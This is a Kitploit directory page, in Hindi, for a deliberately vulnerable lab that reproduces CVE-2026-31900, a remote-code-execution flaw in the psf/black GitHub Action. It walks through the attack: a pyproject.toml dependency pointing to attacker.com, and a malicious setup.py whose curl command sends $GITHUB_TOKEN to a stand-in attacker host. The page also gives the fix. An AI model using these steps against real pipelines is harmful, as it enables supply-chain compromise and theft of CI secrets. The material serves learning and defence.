Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-31900-lab — CVE-2026-31900 असुरक्षित लैब - psf/black GitHub Action RCE | Kitploit
उपकरण/GitHubGitHub/batosay1337lab/cve-2026-31900-lab
भेद्यता विश्लेषणशोषणवेब सुरक्षाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubbatosay1337lab/cve-2026-31900-lab

cve-2026-31900-lab

CVE-2026-31900 असुरक्षित लैब - psf/black GitHub Action RCE

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31900 — असुरक्षित प्रयोगशाला

psf/black GitHub Action में असुरक्षित रेगेक्स सत्यापन के माध्यम से RCE

फ़ील्डविवरण
CVECVE-2026-31900
CVSS8.7 (उच्च)
सलाहGHSA-v53h-f6m7-xcgm
प्रभावितpsf/black GitHub Action < v26.3.0
प्रकारआपूर्ति श्रृंखला के माध्यम से RCE (pull_request ट्रिगर)

भेद्यता

use_pyproject: true विकल्प pyproject.toml से Black संस्करण पढ़ता है। संस्करण स्ट्रिंग को सत्यापित करने के लिए उपयोग किया जाने वाला रेगेक्स re.IGNORECASE के कारण अत्यधिक अनुमेय है, जो स्पेस, @, :, और / जैसे वर्णों की अनुमति देता है — ठीक वही जो PEP 508 URL आवश्यकता के लिए चाहिए।

असुरक्षित रेगेक्स

root@kitploit:~
BLACK_VERSION_RE = re.compile(r"^black(\[^A-Z0-9.\_-\]+.\*)$", re.IGNORECASE)

हमला वेक्टर

  1. इस रिपॉजिटरी को फोर्क करें
  2. अपने फोर्क में pyproject.toml संशोधित करें:
root@kitploit:~
[project]
dependencies = [
    "black @ https://attacker.com/malicious_black.tar.gz"
]
  1. एक पुल रिक्वेस्ट खोलें → pull_request वर्कफ़्लो ट्रिगर सक्रिय होता है
  2. Action pyproject.toml से दुर्भावनापूर्ण संस्करण पढ़ता है, रेगेक्स सत्यापन को बायपास करता है
  3. pip हमलावर-नियंत्रित पैकेज स्थापित करता है → setup.py मनमाना कोड निष्पादित करता है

दुर्भावनापूर्ण पैकेज setup.py उदाहरण

root@kitploit:~
from setuptools import setup
import os

os.system("curl https://attacker.com/exfil?token=$GITHUB_TOKEN")
setup(name="black", version="26.1.0")

क्रेडेंशियल चोरी का प्रभाव

  • $GITHUB_TOKEN (CI रनर टोकन)
  • वर्कफ़्लो वातावरण में इंजेक्ट किए गए कोई भी रहस्य

समाधान

psf/black v26.3.0 में अपग्रेड करें या use_pyproject: true का उपयोग करने के बजाय वर्कफ़्लो YAML में संस्करण को स्पष्ट रूप से पिन करें।

प्रयोगशाला संरचना

root@kitploit:~
.github/workflows/black.yml   ← असुरक्षित वर्कफ़्लो (use_pyproject: true)
pyproject.toml                ← वैध कॉन्फ़िगरेशन (मुख्य शाखा)
app.py                        ← फ़ॉर्मेट किया जा रहा नमूना Python फ़ाइल
टूल डाउनलोड करें